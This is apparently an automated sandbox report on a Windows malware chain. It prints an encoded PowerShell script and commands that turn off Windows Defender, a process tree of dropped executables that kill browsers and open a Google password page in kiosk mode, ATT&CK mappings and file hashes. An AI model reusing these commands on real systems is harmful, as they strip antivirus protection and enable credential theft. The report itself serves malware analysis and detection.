AGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2624
        
        C:\Windows\SysWOW64\sc.exe
        
        "C:\Windows\system32\sc.exe" qc windefend
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3704
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:8
        
        C:\Windows\SysWOW64\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3684
        
        C:\Windows\SysWOW64\net1.exe
        
        "C:\Windows\system32\net1.exe" start TrustedInstaller
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5012
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientAny.exe"' & exit
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientAny.exe"'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\ClientAny.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientAny.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1208 -s 3252
        7⤵
        Program crash
        
        PID:1232
      - C:\Users\Admin\AppData\Local\Temp\1013690001\d6454dce3f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013690001\d6454dce3f.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3080
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3080 -s 772
        7⤵
        Program crash
        
        PID:6172
      - C:\Users\Admin\AppData\Local\Temp\1013691001\ecb59b7c34.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013691001\ecb59b7c34.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1540
      - C:\Users\Admin\AppData\Local\Temp\1013692001\4e424400cf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013692001\4e424400cf.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3184
      - C:\Users\Admin\AppData\Local\Temp\1013693001\cb73b4a261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013693001\cb73b4a261.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1812
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3888
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1308
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:1668
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2516
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:372
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:3236
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3636
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2072 -parentBuildID 20240401114208 -prefsHandle 1988 -prefMapHandle 1980 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {75768d5e-e247-4b67-87ce-0a7081b61a8c} 3636 "\\.\pipe\gecko-crash-server-pipe.3636" gpu
        9⤵
        
        PID:2456
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2504 -parentBuildID 20240401114208 -prefsHandle 2496 -prefMapHandle 2492 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b53a897-8bfb-4dcb-9369-7a71d735a7ad} 3636 "\\.\pipe\gecko-crash-server-pipe.3636" socket
        9⤵
        
        PID:4904
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1468 -childID 1 -isForBrowser -prefsHandle 2680 -prefMapHandle 3168 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21eb92b0-fbb0-4613-ab89-09d9f53ace77} 3636 "\\.\pipe\gecko-crash-server-pipe.3636" tab
        9⤵
        
        PID:2516
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4016 -childID 2 -isForBrowser -prefsHandle 4040 -prefMapHandle 4036 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60d6674f-d103-4f56-8070-d211186beaa3} 3636 "\\.\pipe\gecko-crash-server-pipe.3636" tab
        9⤵
        
        PID:3212
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4804 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4820 -prefMapHandle 4816 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5298ca83-3d14-4924-82ab-4361fa468c33} 3636 "\\.\pipe\gecko-crash-server-pipe.3636" utility
        9⤵
        Checks processor information in registry
        
        PID:6384
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5316 -childID 3 -isForBrowser -prefsHandle 5328 -prefMapHandle 5288 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {13923d91-f938-4725-817c-0ec9520be0bf} 3636 "\\.\pipe\gecko-crash-server-pipe.3636" tab
        9⤵
        
        PID:5324
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 4 -isForBrowser -prefsHandle 5344 -prefMapHandle 5444 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {341462f5-082b-4893-b7ce-c0a98675d6dc} 3636 "\\.\pipe\gecko-crash-server-pipe.3636" tab
        9⤵
        
        PID:5340
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5428 -childID 5 -isForBrowser -prefsHandle 5672 -prefMapHandle 5676 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1cdd81f-62f5-4262-9fe7-53fabffb6f68} 3636 "\\.\pipe\gecko-crash-server-pipe.3636" tab
        9⤵
        
        PID:5352
      - C:\Users\Admin\AppData\Local\Temp\1013694001\66c0d22e78.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013694001\66c0d22e78.exe"
        6⤵
        Modifies Windows Defender Real-time Protection settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4072
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2w1248.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2w1248.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4488
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3K30M.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3K30M.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4304
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4X755p.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4X755p.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Windows security modification
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4288

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4156
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3416
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4776
- - C:\Windows\SysWOW64\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1636
- - C:\Windows\SysWOW64\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1780
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3484
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5016
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3968
- - C:\Windows\SysWOW64\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4752
- - C:\Windows\SysWOW64\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2624
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 112 -ip 112
1⤵
PID:4316

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
PID:1668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1208 -ip 1208
1⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3080 -ip 3080
1⤵
PID:6148

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
5315900105942deb090a358a315b06fe

SHA1
22fe5d2e1617c31afbafb91c117508d41ef0ce44

SHA256
e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7

SHA512
77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TTJXD3SW\download[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
7faaa864072dcdfdcadca468480c885c

SHA1
6707e2978a0c669a8f60c1fe9c430ae2ea51b012

SHA256
2f1a539be395ced9da173e534fa38eb7557803685b2a757a2213981cf51f88d3

SHA512
53864f3023b425130b15794282172477b6fae206771eb6f183c7ad7c3726a5a877cf9c9b485879ca306263164c82004ef8bacbbccd1c69927aa1ee8e9f8472d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
ceed1287eaf3dc645108d9ec428e4970

SHA1
b285f9f4399eaf3f28625dca22f8dd504b3e7c37

SHA256
b96413b5a6a03b00269f4dfd8d7d7b198dc0d6dd10699f28823bbc618ff01e71

SHA512
599542ef19c5327da1ad64f944115b16a00df94512801fb2238d708f1b1f022839207d7f969d13ad47f67c724ba31da80b4d73f26707e638812c4a32bc8b276a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
8ec80f6be1817b7bdd2b66263d23050c

SHA1
a17c6af34d842590b9e7d55cf9f9de7add7e6d6f

SHA256
d3907f0703ce648f87bc27828de972504879d3ce59427109f53d844aba88afed

SHA512
35654ec69546d23c6681f75b580a53818a0e8a6219c5114550d95445b75f26f6f2b16c59257c74fa3a9d7de30d6234e65f0ae74e985b19c736bfd2d391ae4bf0

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yuzka873.default-release\activity-stream.discovery_stream.json

Filesize
19KB

MD5
a6d2ac854b7241ff88ed966faf01ae48

SHA1
a9f2350fd4eb29f6bd4a27141766662a3a4d0ec3

SHA256
50eeb2e935e28e9e0ca834611bed691255b9cd64fd7a90edeb3a632c72bc9170

SHA512
9e0fe32dc9df961be4fe88745880ca9c77e7c592d085ed97fcd12298bfa57216841c9371b4e613ad3f988d0330d48f42f27ebcf19e058e8208d4ae8ceb971f23

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yuzka873.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

Filesize
13KB

MD5
40fed3c22a7541f0f9785e779849a2bd

SHA1
13f45d315544a7552ac1f235511b5d26d8b4238c

SHA256
0cc7f22085795236e9f1c772913455cc7bb19ed6a4ea0827636add8ec5bf3f20

SHA512
88889de18b9e0e1e378668c3312ee98c39905731fa7d4255ec6fd880c6d0ae068a73fc5acc17d6b8e54a233d0ba9cb2ef7992e3c3a4c133609afd0b760fb06a1

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yuzka873.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
15KB

